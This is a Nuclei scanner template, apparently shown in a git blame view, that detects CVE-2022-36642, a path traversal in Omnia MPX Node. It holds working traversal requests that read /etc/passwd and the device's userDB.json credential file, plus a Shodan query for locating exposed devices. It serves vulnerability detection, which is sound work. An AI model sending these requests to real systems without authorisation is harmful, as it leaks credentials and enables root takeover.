nuclei-templates/cves/2022/CVE-2022-36642.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2022-09-03 12:07:26 +00:00
id: CVE-2022-36642
info:
name: Omnia MPX 1.5.0+r1 - Path Traversal
2022-09-04 13:52:42 +00:00
author: arafatansari,ritikchaddha,For3stCo1d
2022-09-03 12:07:26 +00:00
severity: high
description: |
A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
reference:
- https://www.exploit-db.com/exploits/50996
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642
- https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
classification:
cve-id: CVE-2022-36642
metadata:
shodan-query: http.title:"Omnia MPX Node | Login"
verified: "true"
tags: traversal,omnia,edb,cve,cve2022,lfi
2022-09-03 12:07:26 +00:00
requests:
- method: GET
path:
2022-09-04 13:52:42 +00:00
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
2022-09-03 12:07:26 +00:00
2022-09-04 13:52:42 +00:00
stop-at-first-match: true
matchers-condition: or
2022-09-03 12:07:26 +00:00
matchers:
2022-09-04 13:52:42 +00:00
- type: regex
regex:
- "root:[x*]:0:0"
2022-09-03 12:07:26 +00:00
- type: word
part: body
words:
- '"username":'
- '"password":'
- '"mustChangePwd":'
2022-09-04 13:52:42 +00:00
- '"roleUser":'
2022-09-03 12:07:26 +00:00
condition: and